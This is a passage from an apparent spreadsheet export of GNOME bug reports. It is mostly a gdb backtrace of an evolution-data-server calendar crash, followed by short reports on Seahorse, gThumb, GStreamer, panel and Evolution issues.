#8  0x40991fb9 in g_thread_create_full () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#9  0x40a18aa7 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#10 0x40adfc2e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 3 (Thread 1096170416 (LWP 25541)):
#0  0xffffe410 in ?? ()
No symbol table info available.
#1  0x41562b1c in ?? ()
No symbol table info available.
#2  0x00000002 in ?? ()
No symbol table info available.
#3  0x00000000 in ?? ()
No symbol table info available.
#4  0x40a1d05e in __lll_mutex_lock_wait () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0x40a19e2d in _L_mutex_lock_33 () from /lib/tls/libpthread.so.0
No symbol table info available.
#6  0x41562b1c in ?? ()
No symbol table info available.
#7  0x0000000b in ?? ()
No symbol table info available.
#8  0x40b3aff4 in ?? () from /lib/tls/libc.so.6
No symbol table info available.
#9  0x080b57b4 in ?? ()
No symbol table info available.
#10 0x40b30111 in __libc_ptyname1 () from /lib/tls/libc.so.6
No symbol table info available.
#11 0x41562b3c in ?? ()
No symbol table info available.
#12 0x0804b744 in gnome_segv_handler (signo=134535292) at server.c:97
	gnome_segv_path = 0x40b30111 
	in_segv = 1
	exec = 0x80b57b4 Ã˜Â²0B
#13 0x0804b744 in gnome_segv_handler (signo=11) at server.c:97
	gnome_segv_path = 0x41562bb8 {
	in_segv = 1
	exec = 0x409d11d4 Â¸Ã°\a
#14 
No symbol table info available.
#15 0x40a4f649 in getenv () from /lib/tls/libc.so.6
No symbol table info available.
#16 0x40aa03b9 in tzset_internal () from /lib/tls/libc.so.6
No symbol table info available.
#17 0x40aa0f6e in tzset () from /lib/tls/libc.so.6
No symbol table info available.
#18 0x40aa5584 in strftime_l () from /lib/tls/libc.so.6
No symbol table info available.
#19 0x40aa5446 in strftime () from /lib/tls/libc.so.6
No symbol table info available.
#20 0x402eb352 in isodate_from_time_t (t=1144839714) at e-cal-time-util.c:577
	ret = (gchar *) 0x42415060 `
	stm = {tm_sec = 54 tm_min = 1 tm_hour = 11 tm_mday = 12 
  tm_mon = 3 tm_year = 106 tm_wday = 3 tm_yday = 101 tm_isdst = 0 
  tm_gmtoff = 0 tm_zone = 0x40b3010b GMT}
#21 0x402d684d in e_cal_component_gen_uid () at e-cal-component.c:432
	iso = 0xa 
	ret = 0x402e1da0
\203Ã„\020\211\006Ã¨\022Ã°Ã½Ã¿\211EÃ°\213uÃ´\203Ã¬\fÃ¿uÃ°Ã¨Ã¡\033Ã¾Ã¿\203Ã„\020\211F\004\203Ã¬\b\215\203rtÃ¿Ã¿P\213EÃ´Ã¿p\004Ã¨Ã¦Ã¦Ã½Ã¿\203Ã„\020\203Ã¬\b\213EÃ´Ã¿p\004\213EÃ´Ã¿0Ã¨
Ã½Ã½Ã¿\203Ã„\020\203Ã¬\fÃ¿uÃ°Ã¨Â¢\Ã¾Ã¿\203Ã„\020\213EÃ´Ã‡@\b
	hostname = 0x403425a0 oa3
	t = 1144839714
	serial = 51
#22 0x402e1daa in e_cal_component_alarm_new () at e-cal-component.c:5295
	alarm = (ECalComponentAlarm *) 0x42405430
	new_auid = 0x41563338
Â¨3VAÃ»ÃŸÃ˜@Ã°Â¥tB\210\237\t\bÂ¨3VAÃ…Ã Ã˜@\210Ã’1B\bÃ¶\a\b\177\f\177\003\001
#23 0x40d972e2 in e_gw_item_to_cal_component (item=0x4274a5f0 cbgw=0x8099f88)
    at e-cal-backend-groupwise-utils.c:1108
	alarm = (ECalComponentAlarm *) 0x42743800
	trigger = {type = E_CAL_COMPONENT_ALARM_TRIGGER_RELATIVE_START u = {
    rel_duration = {is_neg = 1084035540 days = 1114892720 
      weeks = 1084784917 hours = 0 minutes = 0 seconds = 0} abs_time = {
      year = 1084035540 month = 1114892720 day = 1084784917 hour = 0 
      minute = 0 second = 0 is_utc = 1084784917 is_date = 1111552176 
      is_daylight = 0 zone = 0x4273e9b0}}}
	comp = (ECalComponent *) 0x4230a5a0
	text = {value = 0x0 altrep = 0x0}
	dt = {value = 0x41563280 tzid = 0x424066d0 UTC}
	description = 0x4274af20 Busy
	uid = 0x4274aea0 20060316T152422Z-32064-396-31953-37@oa3
	t = 0x4274af08 20060328T160000Z
	name = 0x81b7db0 Ã¢\003
	category_ids = (GList *) 0x0
	categories = (GSList *) 0x0
	categories_by_id = (GHashTable *) 0x424079b0
	is_allday = 0
	default_zone = (icaltimezone *) 0x0
	itt = {year = 1110512680 month = 29 day = 1096168168 
  hour = 1084784917 minute = 1083334112 second = 1085523968 
  is_utc = 137285648 is_date = 1084035540 is_daylight = 137285648 
  zone = 0x42311428}
	itt_utc = {year = 2006 month = 3 day = 28 hour = 16 minute = 0 
  second = 0 is_utc = 1 is_date = 0 is_daylight = 0 zone = 0x403428e0}
	priority = 1083334112
	percent = 137481056
	alarm_duration = -300
	recipient_list = (GSList *) 0x8311e90
	rl = (GSList *) 0x0
	attendee_list = (GSList *) 0x82cc648
	organizer = (EGwItemOrganizer *) 0x4274ae50
	item_type = E_GW_ITEM_TYPE_APPOINTMENT
#24 0x40d8dffb in populate_cache (cbgw=0x8099f88)
    at e-cal-backend-groupwise.c:178
	item = (EGwItem *) 0x4274a5f0
	progress_string = 0x0
	priv = (ECalBackendGroupwisePrivate *) 0x80a0538
	status = E_GW_CONNECTION_STATUS_OK
	comp = (ECalComponent *) 0x82ed010
	list = (GList *) 0x4231d39c
	l = (GList *) 0x4231d288
	done = 0
	cursor = 119851308
	total = 178
	num = 8
	percent = 4
	position = 0x40d99add end
	kind = ICAL_VTODO_COMPONENT
	type = 0x40d99aea Task
#25 0x40d8fabd in cache_init (cbgw=0x8099f88) at e-cal-backend-groupwise.c:649
	priv = (ECalBackendGroupwisePrivate *) 0x80a0538
	cnc_status = E_GW_CONNECTION_STATUS_OK
	kind = ICAL_VTODO_COMPONENT
	opts = (EGwSendOptions *) 0x819e0e8
	time_interval_string = 0x0
	time_interval = 600000
#26 0x40991fb9 in g_thread_create_full () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#27 0x40a18aa7 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#28 0x40adfc2e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 2 (Thread 1094069168 (LWP 25542)):
#0  0xffffe410 in ?? ()
No symbol table info available.
#1  0x41362018 in ?? ()
No symbol table info available.
#2  0x00000002 in ?? ()
No symbol table info available.
#3  0x00000000 in ?? ()
No symbol table info available.
#4  0x40a1d05e in __lll_mutex_lock_wait () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0x40a19e2d in _L_mutex_lock_33 () from /lib/tls/libpthread.so.0
No symbol table info available.
#6  0x00000004 in ?? ()
No symbol table info available.
#7  0x0000000c in ?? ()
No symbol table info available.
#8  0x4033453c in ?? () from /opt/gnome/lib/libecal-1.2.so.3
No symbol table info available.
#9  0x0819ed38 in ?? ()
No symbol table info available.
#10 0x42418930 in ?? ()
No symbol table info available.
#11 0x413620c8 in ?? ()
No symbol table info available.
#12 0x4030c735 in icaltime_as_timet_with_zone (tt=
      {year = 1077160072 month = 0 day = 44 hour = 1076938300 minute =
134593904 second = 0 is_utc = 1094066296 is_date = 1083586624 is_daylight =
2006 zone = 0x4} zone=0xc) at icaltime.c:426
	utc_zone = (icaltimezone *) 0x4033453c
	stm = {tm_sec = 2006 tm_min = 4 tm_hour = 12 tm_mday = 4 
  tm_mon = 0 tm_year = 1094066200 tm_wday = 2 tm_yday = 0 
  tm_isdst = 1084346462 tm_gmtoff = 1077160072 tm_zone = 0x40a21ff4 ÃÃ®}
	t = 1076948825
	old_tz = 0x41362018 Ãˆ 6A5Ã‡0@\210(4@
	local_tt = {year = 1111554940 month = 7 day = 835846144 
  hour = 1097859344 minute = 1097859144 second = 1097935096 
  is_utc = 1094066136 is_date = 1084787249 is_daylight = 1097906968 
  zone = 0x40b3c800}
#13 0x4030c735 in icaltime_as_timet_with_zone (tt=
      {year = 2006 month = 4 day = 12 hour = 4 minute = 0 second = 0
is_utc = 0 is_date = 0 is_daylight = 0 zone = 0x0} zone=0x403428e0)
    at icaltime.c:426
	utc_zone = (icaltimezone *) 0x403428e0
	stm = {tm_sec = 0 tm_min = 0 tm_hour = 4 tm_mday = 12 tm_mon = 3 
  tm_year = 106 tm_wday = 0 tm_yday = 0 tm_isdst = -1 tm_gmtoff = 0 
  tm_zone = 0x0}
	t = 1083588378
	old_tz = 0x41362098 
	local_tt = {year = 2006 month = 4 day = 12 hour = 4 minute = 0 
  second = 0 is_utc = 0 is_date = 0 is_daylight = 0 zone = 0x0}
#14 0x402eb5c4 in time_from_isodate (str=0x82dd690 20060412T040000Z)
    at e-cal-time-util.c:637
	tt = {year = 2006 month = 4 day = 12 hour = 4 minute = 0 
  second = 0 is_utc = 0 is_date = 0 is_daylight = 0 zone = 0x0}
	utc_zone = (icaltimezone *) 0x403428e0
	len = 16
	i = 16
#15 0x4028d3c5 in e_cal_backend_sexp_func_make_time (esexp=0x819c3c8 argc=1 
    argv=0x41362190 data=0x819ed38) at e-cal-backend-sexp.c:117
	str = 0x82dd690 20060412T040000Z
	t = 137281840
	result = (ESExpResult *) 0x41362198
#16 0x4036a825 in e_sexp_term_eval (f=0x819c3c8 t=0x80b5200) at e-sexp.c:710
	r = (struct _ESExpResult *) 0x0
	i = 1
	argv = (struct _ESExpResult **) 0x41362190
#17 0x4036a7dd in e_sexp_term_eval (f=0x819c3c8 t=0x80b5110) at e-sexp.c:706
	r = (struct _ESExpResult *) 0x0
	i = 0
	argv = (struct _ESExpResult **) 0x413621f0
#18 0x4036b976 in e_sexp_eval (f=0x819c3c8) at e-sexp.c:1304
No locals.
#19 0x4028e819 in e_cal_backend_sexp_match_comp (sexp=0x819ebd8 
    comp=0x82e4530 backend=0x8082188) at e-cal-backend-sexp.c:1045
	r = (ESExpResult *) 0x4
	retval = 137250096
#20 0x4028e8fa in e_cal_backend_sexp_match_object (sexp=0x819ebd8 
    object=0x823fed8
BEGIN:VEVENT\nUID:20060403T135402Z-8457-1825-1-36@oa3\nDTSTAMP:20060403T135251Z\nX-GWRECORDID:4430F073.largo-do.largo-po.100.1347534.1.2002.1@4:\n
A.largo-do.largo-po.100.0.1.0.1@19\nSUMMARY:From Christine... 
    backend=0x8082188) at e-cal-backend-sexp.c:1081
	comp = (ECalComponent *) 0x82e4530
	icalcomp = (icalcomponent *) 0x81cb3a0
	retval = 1094066920
#21 0x402978b0 in e_data_cal_view_object_matches (query=0x819d460 
    object=0x823fed8
BEGIN:VEVENT\nUID:20060403T135402Z-8457-1825-1-36@oa3\nDTSTAMP:20060403T135251Z\nX-GWRECORDID:4430F073.largo-do.largo-po.100.1347534.1.2002.1@4:\n
A.largo-do.largo-po.100.0.1.0.1@19\nSUMMARY:From Christine...)
    at e-data-cal-view.c:516
	priv = (EDataCalViewPrivate *) 0x80b50f0
#22 0x4028ab01 in e_cal_backend_notify_object_created (backend=0x8082188 
    calobj=0x823fed8
BEGIN:VEVENT\nUID:20060403T135402Z-8457-1825-1-36@oa3\nDTSTAMP:20060403T135251Z\nX-GWRECORDID:4430F073.largo-do.largo-po.100.1347534.1.2002.1@4:\n
A.largo-do.largo-po.100.0.1.0.1@19\nSUMMARY:From Christine...)
    at e-cal-backend.c:1121
	priv = (ECalBackendPrivate *) 0x8095e48
	queries = (EList *) 0x80952c8
	iter = (EIterator *) 0x82c8050
	query = (EDataCalView *) 0x819d460
#23 0x40d8e16b in populate_cache (cbgw=0x8082188)
    at e-cal-backend-groupwise.c:200
	comp_str = 0x823fed8
BEGIN:VEVENT\nUID:20060403T135402Z-8457-1825-1-36@oa3\nDTSTAMP:20060403T135251Z\nX-GWRECORDID:4430F073.largo-do.largo-po.100.1347534.1.2002.1@4:\n
A.largo-do.largo-po.100.0.1.0.1@19\nSUMMARY:From Christine...
	item = (EGwItem *) 0x82ed798
	progress_string = 0x41719498 Loading Calendar items
	priv = (ECalBackendGroupwisePrivate *) 0x8094148
	status = E_GW_CONNECTION_STATUS_OK
	comp = (ECalComponent *) 0x82ab7a8
	list = (GList *) 0x4231de2c
	l = (GList *) 0x4231df10
	done = 0
	cursor = 119851307
	total = 178
	num = 8
	percent = 4
	position = 0x40d99add end
	kind = ICAL_VEVENT_COMPONENT
	type = 0x40d99ae1 Calendar
#24 0x40d8fabd in cache_init (cbgw=0x8082188) at e-cal-backend-groupwise.c:649
	priv = (ECalBackendGroupwisePrivate *) 0x8094148
	cnc_status = E_GW_CONNECTION_STATUS_OK
	kind = ICAL_VEVENT_COMPONENT
	opts = (EGwSendOptions *) 0x819e0e8
	time_interval_string = 0x0
	time_interval = 600000
#25 0x40991fb9 in g_thread_create_full () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#26 0x40a18aa7 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#27 0x40adfc2e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 1 (Thread 1085556288 (LWP 25479)):
#0  0xffffe410 in ?? ()
No symbol table info available.
#1  0x00000001 in ?? ()
No symbol table info available.
#2  0x00000000 in ?? ()
No symbol table info available.
#3  0xbfffe2e8 in ?? ()
No symbol table info available.
#4  0x40aae19b in __waitpid_nocancel () from /lib/tls/libc.so.6
No symbol table info available.
#5  0x40a59c68 in do_system () from /lib/tls/libc.so.6
No symbol table info available.
#6  0x40a59ff0 in system () from /lib/tls/libc.so.6
No symbol table info available.
#7  0x40a1e66d in system () from /lib/tls/libpthread.so.0
No symbol table info available.
#8  0x0804b7c0 in gnome_segv_handler (signo=11) at server.c:114
	gnome_segv_path = 0x804c79c /opt/gnome/lib/libgnomeui/gnome_segv2
	in_segv = 1
	exec = 0x81cc060 /opt/gnome/lib/libgnomeui/gnome_segv2
\/opt/gnome/libexec/evolution-data-server-1.6\ 11 \1.6.0\
#9  
No symbol table info available.
#10 0xffffe410 in ?? ()
No symbol table info available.
#11 0xbfffe770 in ?? ()
No symbol table info available.
#12 0x00000002 in ?? ()
No symbol table info available.
#13 0x00000000 in ?? ()
No symbol table info available.
#14 0x40aeb7fe in __lll_mutex_lock_wait () from /lib/tls/libc.so.6
No symbol table info available.
#15 0x40aa102d in _L_mutex_lock_2146 () from /lib/tls/libc.so.6
No symbol table info available.
#16 0x40b3aff4 in ?? () from /lib/tls/libc.so.6
No symbol table info available.
#17 0xbfffe788 in ?? ()
No symbol table info available.
#18 0x40a9fdc7 in timelocal () from /lib/tls/libc.so.6
No symbol table info available.
#19 0x40a9fdc7 in timelocal () from /lib/tls/libc.so.6
No symbol table info available.
#20 0x4030c759 in icaltime_as_timet_with_zone (tt=
      {year = 2006 month = 4 day = 13 hour = 4 minute = 0 second = 0
is_utc = 0 is_date = 0 is_daylight = 0 zone = 0x0} zone=0x403428e0)
    at icaltime.c:435
	utc_zone = (icaltimezone *) 0x403428e0
	stm = {tm_sec = 0 tm_min = 0 tm_hour = 4 tm_mday = 13 tm_mon = 3 
  tm_year = 106 tm_wday = 0 tm_yday = 0 tm_isdst = -1 tm_gmtoff = 0 
  tm_zone = 0x0}
	t = 1144814400
	old_tz = 0x0
	local_tt = {year = 2006 month = 4 day = 13 hour = 4 minute = 0 
  second = 0 is_utc = 0 is_date = 0 is_daylight = 0 zone = 0x0}
#21 0x402eb5c4 in time_from_isodate (str=0x4230a500 20060413T040000Z)
    at e-cal-time-util.c:637
	tt = {year = 2006 month = 4 day = 13 hour = 4 minute = 0 
  second = 0 is_utc = 0 is_date = 0 is_daylight = 0 zone = 0x0}
	utc_zone = (icaltimezone *) 0x403428e0
	len = 16
	i = 16
#22 0x4028d3c5 in e_cal_backend_sexp_func_make_time (esexp=0x42406a38 
    argc=1 argv=0xbfffe900 data=0x42408470) at e-cal-backend-sexp.c:117
	str = 0x4230a500 20060413T040000Z
	t = 136027768
	result = (ESExpResult *) 0x81b9ee8
#23 0x4036a825 in e_sexp_term_eval (f=0x42406a38 t=0x42403380)
    at e-sexp.c:710
	r = (struct _ESExpResult *) 0x0
	i = 1
	argv = (struct _ESExpResult **) 0xbfffe900
#24 0x4036a7dd in e_sexp_term_eval (f=0x42406a38 t=0x424032b0)
    at e-sexp.c:706
	r = (struct _ESExpResult *) 0x0
	i = 1
	argv = (struct _ESExpResult **) 0xbfffe960
#25 0x4036b976 in e_sexp_eval (f=0x42406a38) at e-sexp.c:1304
No locals.
#26 0x4028e819 in e_cal_backend_sexp_match_comp (sexp=0x424012c0 
    comp=0x424122c8 backend=0x808f498) at e-cal-backend-sexp.c:1045
	r = (ESExpResult *) 0x4
	retval = 1111565000
#27 0x4028e8fa in e_cal_backend_sexp_match_object (sexp=0x424012c0 
    object=0x4273bd68
BEGIN:VEVENT\nUID:20060412T110154Z-25479-413-1-47@oa3\nDTSTAMP:20060412T110154Z\nDTSTARTVALUE=DATE:20060417\nDTENDVALUE=DATE:20060418\nSUMMARY:59.0/46.0Ã‚Â°F
- Milwaukee\nDESCRIPTIONALTREP=:Partly cloudy\\n... 
    backend=0x808f498) at e-cal-backend-sexp.c:1081
	comp = (ECalComponent *) 0x424122c8
	icalcomp = (icalcomponent *) 0x424edbb8
	retval = -1073747368
#28 0x402978b0 in e_data_cal_view_object_matches (query=0x424078d8 
    object=0x4273bd68
BEGIN:VEVENT\nUID:20060412T110154Z-25479-413-1-47@oa3\nDTSTAMP:20060412T110154Z\nDTSTARTVALUE=DATE:20060417\nDTENDVALUE=DATE:20060418\nSUMMARY:59.0/46.0Ã‚Â°F
- Milwaukee\nDESCRIPTIONALTREP=:Partly cloudy\\n...)
    at e-data-cal-view.c:516
	priv = (EDataCalViewPrivate *) 0x42408d20
#29 0x4028ab01 in e_cal_backend_notify_object_created (backend=0x808f498 
    calobj=0x4273bd68
BEGIN:VEVENT\nUID:20060412T110154Z-25479-413-1-47@oa3\nDTSTAMP:20060412T110154Z\nDTSTARTVALUE=DATE:20060417\nDTENDVALUE=DATE:20060418\nSUMMARY:59.0/46.0Ã‚Â°F
- Milwaukee\nDESCRIPTIONALTREP=:Partly cloudy\\n...)
    at e-cal-backend.c:1121
	priv = (ECalBackendPrivate *) 0x808f4b8
	queries = (EList *) 0x808f500
	iter = (EIterator *) 0x424122b0
	query = (EDataCalView *) 0x424078d8
#30 0x40df21d1 in finished_retrieval_cb (forecasts=0x4231e0e4 cbw=0x808f498)
    at e-cal-backend-weather.c:167
	priv = (ECalBackendWeatherPrivate *) 0x8095530
	comp = (ECalComponent *) 0x81cc5d0
	icomp = (icalcomponent *) 0x82e1c08
	l = (GList *) 0x4231e0d8
#31 0x40df548a in e_weather_source_ccf_do_parse (source=0x807c6e0 
    buffer=0x82cc1d0 \n000) at e-weather-source-ccf.c:386
	forecasts = (WeatherForecast *) 0x82b98c0
	tokens = (GSList *) 0x8097fa8
	date = (GSList *) 0x8311e18
	current = (GSList *) 0x4276ebe0
	fc = (GList *) 0x4231e0e4
	tms = {tm_sec = 53 tm_min = 0 tm_hour = 10 tm_mday = 12 
  tm_mon = 3 tm_year = 106 tm_wday = 3 tm_yday = 101 tm_isdst = 1 
  tm_gmtoff = -14400 tm_zone = 0x80b80d0 EDT}
	i = 7
	base = 1144850453
	n = 7
#32 0x40df55d8 in retrieval_done (message=0x80b25e0 source=0x807c6e0)
    at e-weather-source-ccf.c:423
	str = 0x82cc1d0 \n000
	newuri = 0x408f9279 \213uÃ¸\213}Ã¼\211Ã¬]Ãƒ\215Â¶
#33 0x409068a6 in g_cclosure_marshal_VOID__VOID ()
   from /opt/gnome/lib/libgobject-2.0.so.0
No symbol table info available.
#34 0x408f98db in g_closure_invoke () from /opt/gnome/lib/libgobject-2.0.so.0
No symbol table info available.
#35 0x40908d8b in g_signal_chain_from_overridden ()
   from /opt/gnome/lib/libgobject-2.0.so.0
No symbol table info available.
#36 0x4090a13b in g_signal_emit_valist ()
   from /opt/gnome/lib/libgobject-2.0.so.0
No symbol table info available.
#37 0x4090a626 in g_signal_emit () from /opt/gnome/lib/libgobject-2.0.so.0
No symbol table info available.
#38 0x40bb23d1 in soup_message_finished (msg=0x80b25e0) at soup-message.c:558
No locals.
#39 0x40bb42a9 in soup_message_io_finished (msg=0x80b25e0)
    at soup-message-io.c:153
No locals.
#40 0x40bb52a4 in io_read (sock=0x80933e8 msg=0x80b25e0)
    at soup-message-io.c:697
	priv = (SoupMessagePrivate *) 0x80b2620
	io = (SoupMessageIOData *) 0x80b3e78
	status = 200
#41 0x409068a6 in g_cclosure_marshal_VOID__VOID ()
   from /opt/gnome/lib/libgobject-2.0.so.0
No symbol table info available.
#42 0x408f98db in g_closure_invoke () from /opt/gnome/lib/libgobject-2.0.so.0
No symbol table info available.
#43 0x40908d8b in g_signal_chain_from_overridden ()
   from /opt/gnome/lib/libgobject-2.0.so.0
No symbol table info available.
#44 0x4090a13b in g_signal_emit_valist ()
   from /opt/gnome/lib/libgobject-2.0.so.0
No symbol table info available.
#45 0x4090a626 in g_signal_emit () from /opt/gnome/lib/libgobject-2.0.so.0
No symbol table info available.
#46 0x40bc1c7a in socket_read_watch (chan=0x80b3c38 cond=G_IO_IN 
    user_data=0x80933e8) at soup-socket.c:1069
	sock = (SoupSocket *) 0x80933e8
	priv = (SoupSocketPrivate *) 0x80933f8
#47 0x4099c69f in g_io_channel_unix_get_fd ()
   from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#48 0x40975967 in g_main_context_dispatch ()
   from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#49 0x40977ce2 in g_main_context_acquire ()
   from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#50 0x40978cf7 in g_main_loop_run () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#51 0x40810cf0 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
No symbol table info available.
#52 0x0804bf20 in main (argc=3 argv=0xbffff684) at server.c:393
	did_books = 1
	did_cals = 1
	offline_listener = (OfflineListener *) 0x807b790
#0  0xffffe410 in ?? ()
Other information:</t>
  </si>
  <si>
    <t>SEAHORSE-111899</t>
  </si>
  <si>
    <t>encrypt to self setting is not respected</t>
  </si>
  <si>
    <t>This will be addressed after 0.7.3. The reason is that getting the default
key is not trivial at the moment (this is also the reason that verify does
not show the key's info). This can and will be solved using HashTables.</t>
  </si>
  <si>
    <t>jap1</t>
  </si>
  <si>
    <t>GNOME-APPLETS-458591</t>
  </si>
  <si>
    <t>Search doesn't work if there are more places with the same name</t>
  </si>
  <si>
    <t>Go to the preferences dialog and search for Birmingham you will get the one in the USA so you have to search manually for Birmingham in the UK.
While searching the configuration dialog should only show the matching places.</t>
  </si>
  <si>
    <t>GTHUMB-355376</t>
  </si>
  <si>
    <t>Help shortcut should be F1 instead of Ctrl+H</t>
  </si>
  <si>
    <t>According to GNOME HIG http://developer.gnome.org/projects/gup/hig/2.0/menus-standard.html#menu-standard-help
keyboard shortcut for Help Contents page should be F1 and not Ctrl+H
Other information:</t>
  </si>
  <si>
    <t>petrosyan</t>
  </si>
  <si>
    <t>GSTREAMER-118474</t>
  </si>
  <si>
    <t>gstputbits should be rewritten</t>
  </si>
  <si>
    <t>The gstputbits plugin (gstreamer/gst/putbits/putbits.[ch]) are under
the MPEG lciense. This license clearly states that there may be IP
in the code.  No plugin in the core should be under any license
that is not LGPL.  This plugin should be rewritten so it can be under
the LGPL or moved to gst-plugins.  According to my conversations with
Wim Taymans the putbits plugin is only used by mpegaudio and mpeg2enc.</t>
  </si>
  <si>
    <t>GNOME-CORE-2760</t>
  </si>
  <si>
    <t>crash panel using Desk Guide applet</t>
  </si>
  <si>
    <t xml:space="preserve">Package:	gnome-core
Version:	October Gnome
Severity:	critical
&gt;Originator: 	 Itamar S.-T.
&gt;Organization:
net
&gt;Synopsis:	When panel shows in Desk Guide trying to move it crashes it
&gt;Class:		sw-bug
&gt;Gnome-Libs-Release: gnome-libs-1.0.53
&gt;Environment:
    	RH6 with updates RPMs from ftp.gnome.org mirror
System: Linux porthos 2.2.12 #2 Mon Aug 23 21:30:57 IDT 1999 i686 unknown
Architecture: i686
Distribution: Red Hat Version: Red Hat Linux release 6.0 (Hedwig)
&gt;Description:
	Using the Desk Guide applet you can crash the panel.
&gt;How-To-Repeat:
	Have the Desk Guide show all window classes so the panel and gmc icons also show up in the Desk Guide mini-screen.  Now try moving the panel inside the Desk Guide with the middle button like you'd move a regular window.  The panel disappears.
&gt;Fix:
	Assume people won't do stupid things like this?
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 13:09 -------
This bug was previously known as bug 2760 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=2760
Originally filed under the gnome-core product and panel component.
The original reporter (itamar@porthos.maxnm.com) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>itamar</t>
  </si>
  <si>
    <t>EVOLUTION-241965</t>
  </si>
  <si>
    <t>Accessing calendar causes evolution to crash</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.3.2.99
Synopsis: Accessing calendar causes evolution to crash
Bugzilla-Product: Evolution
Bugzilla-Component: Calendar
BugBuddy-GnomeVersion: 2.0 (2.2.0.1)
Description:
Description of Problem:
Accessing calendar causes evolution to crash
Steps to reproduce the problem:
1. 
2. 
3. 
Actual Results:
crash
Expected Results:
opening the calendar
How often does this happen?
Always
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/evolution-1.3'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New
Thread 1093582080 (LWP 8640)]
[New Thread 1150520624 (LWP 8645)]
[New Thread 1142127920 (LWP 8644)]
[New Thread 1133735216 (LWP 8643)]
[New Thread 1125342512 (LWP 8642)]
[New Thread 1116949808 (LWP 8641)]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0xffffe002 in ?? ()
#0  0xffffe002 in ?? ()
#1  0x4022cfa7 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#2  
#3  0xffffe002 in ?? ()
#4  0x42028b93 in abort () from /lib/tls/libc.so.6
#5  0x41175c08 in g_logv () from /usr/lib/libglib-2.0.so.0
#6  0x41175c44 in g_log () from /usr/lib/libglib-2.0.so.0
#7  0x40794279 in gnome_canvas_get_item_at ()
   from /usr/lib/libgnomecanvas-2.so.0
#8  0x407941f4 in gnome_canvas_get_item_at ()
   from /usr/lib/libgnomecanvas-2.so.0
#9  0x40791980 in gnome_canvas_new_aa () from
/usr/lib/libgnomecanvas-2.so.0
#10 0x40793860 in gnome_canvas_set_scroll_region ()
   from /usr/lib/libgnomecanvas-2.so.0
#11 0x403593e8 in set_header_canvas_width () from
/usr/lib/libgal-2.0.so.2
#12 0x403598eb in table_canvas_reflow_idle () from
/usr/lib/libgal-2.0.so.2
#13 0x40359a1c in table_canvas_size_allocate () from
/usr/lib/libgal-2.0.so.2
#14 0x41129814 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
#15 0x41115ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#16 0x41128983 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#17 0x411279a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#18 0x41127be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#19 0x40e450cc in gtk_widget_size_allocate () from
/usr/lib/libgtk-x11-2.0.so.0
#20 0x40dbea79 in gtk_table_get_homogeneous ()
   from /usr/lib/libgtk-x11-2.0.so.0
#21 0x41129814 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
#22 0x41116247 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#23 0x41115ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#24 0x4112820f in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#25 0x411279a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#26 0x41127be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#27 0x40e450cc in gtk_widget_size_allocate () from
/usr/lib/libgtk-x11-2.0.so.0
#28 0x40d9d7a6 in gtk_scrolled_window_get_shadow_type ()
   from /usr/lib/libgtk-x11-2.0.so.0
#29 0x41129814 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
#30 0x41116247 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#31 0x41115ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#32 0x4112820f in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#33 0x411279a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#34 0x41127be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#35 0x40e450cc in gtk_widget_size_allocate () from
/usr/lib/libgtk-x11-2.0.so.0
#36 0x40dbea79 in gtk_table_get_homogeneous ()
   from /usr/lib/libgtk-x11-2.0.so.0
#37 0x41129814 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
#38 0x41116247 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#39 0x41115ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#40 0x4112820f in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#41 0x411279a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#42 0x41127be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#43 0x40e450cc in gtk_widget_size_allocate () from
/usr/lib/libgtk-x11-2.0.so.0
#44 0x40e3f0e0 in gtk_vpaned_new () from /usr/lib/libgtk-x11-2.0.so.0
